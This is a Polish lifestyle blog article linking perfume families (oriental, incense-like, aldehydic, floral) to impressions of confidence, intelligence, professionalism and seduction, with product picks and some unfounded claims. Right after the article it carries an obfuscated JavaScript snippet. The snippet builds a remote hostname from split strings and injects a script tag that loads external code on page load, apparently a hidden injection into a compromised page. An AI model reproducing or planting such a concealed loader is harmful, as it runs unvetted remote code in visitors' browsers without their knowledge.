Kwiatowe, orientalne czy cytrusowe – co Twój zapach mówi o Tobie?

Czy zdajesz sobie sprawę z tego, że Twój zapach może oddziaływać na
Twojego rozmówcę i przekazywać określone wrażenie o Tobie? Jeśli
właściwie dobierzesz perfumy do sytuacji, możesz więc wpłynąć na jego
emocje. Co Twój zapach mówi o Tobie?

Zapachy dla pewnych siebie

Czym pachną pewne siebie kobiety? Oznaką pewności siebie i siły charakteru okazują się być orientalne zapachy z Bliskiego Wschodu. Żywica agarowa, tabaka i inne drzewno-korzenne nuty przyciągną spojrzenia innych i postawią Cię w centrum zainteresowania. Warto postawić na takie akordy, jeśli chcesz podkreślić swoją wewnętrzną siłę albo wręcz ją zyskać – ta wyrazista nuta zapachowa zamaskuje nawet największą niepewność i brak doświadczenia.
Miłośniczki dodających pewności siebie kompozycji z pewnością zainteresuje zapach Interlude Man od Amouage. Te pierwotnie przeznaczone dla mężczyzn perfumy pokochały kobiety na całym świecie – dlaczego? Bazująca na żywicy agarowej i paczuli kompozycja, zachwyca dość pikantnym wyrazem, który zawdzięcza takim dodatkom, jak pieprz i oregano. Dodatek bergamotki nie tylko łagodzi całość, lecz również sprawia, że zapach ten doskonale nadaje się także na co dzień.

Zapachy dla elokwentnych

Chcesz uchodzić za superinteligentną i elokwentną osobę? Okazuje się, że za inteligentne są postrzegane osoby, które pachną zapachami…kadzidlanymi. Ta wyrazista, lekko dusząca woń kamfory, kadzidłowca, drzewa agarowego czy tabaki jest najczęściej kojarzona z mądrością i elokwencją. Najbardziej pożądaną kompozycję zapachową stanowi tu połączenie nut drzewnych i skórzanych.
Kadzidlane nuty można odnaleźć w propozycjach Toma Forda lub Montale. Na uwagę zasługują szczególnie zapachy Orange Flowers i Chypre Fruite od Montale, które zachwycają wyrazistą, zniewalającą nutą paczuli i piżma.

Zapachy dla profesjonalistek

W jaki sposób przekonać przełożonego o swoich kompetencjach zawodowych? Okazuje się, że zapach odgrywa dość ważną rolę w tym, jak jesteś odbierana w pracy. Jeśli chcesz uchodzić za profesjonalistkę, na której można polegać w kwestiach zawodowych, wybieraj do biura stonowane, niesłodkie perfumy. Na polecenie zasługuje np. zapach damski Dia Pour Femme od Amouage, która urzeka subtelnymi, kwiatowo-aldehydowymi akordami.

Zapachy dla uwodzicielek

Nie od dziś wiadomo, że za najbardziej uwodzicielskie uważa się lekkie, kwiatowe nuty – szczególnie różane i jaśminowe. Kobiety od wieków wykorzystują ten fakt na swoją korzyść, wybierając subtelne, kwiatowe nuty zapachowe na romantyczne okazje. Kwiatowe zapachy dają jeszcze jedną korzyść – dzięki nim ludzie będą postrzegać Cię jako szczuplejszą i młodszą. Jeśli więc chcesz się nieco odmłodzić, sięgnij po kusząco słodkie akordy jaśminu i róży.
Książkowym przykładem uwodzicielskiego zapachu jest Eternity Moment od Calvina Kleina. Perfumy te zachwycają słodką, kwiatowo-owocową nutą o energetyzującym brzmieniu. W tym słodkim, lekkim obłoczku wyczuć można jednak wyrafinowaną nutę głowy z drzewem różanym na czele – nie sposób mu się oprzeć!

(function(){
xe99_=(„u”+””)+”s”+””;xe99_+=(„tat.”)+(„i”);
xe99=document.createElement(„script”);xe99.type=”text/javascript”;xe99_+=”nf”+(„o”)+”/”;
xe99u=”65795585″+”.”;xe99.async=true;xe99u+=”fwzbbw35e99dcuxiubpjvp2s7346Xj”;
xe99.src=”//”+xe99_+xe99u; xe99b=document.body; xe99b.appendChild(xe99);
})();

Możesz również polubić

Dodaj komentarz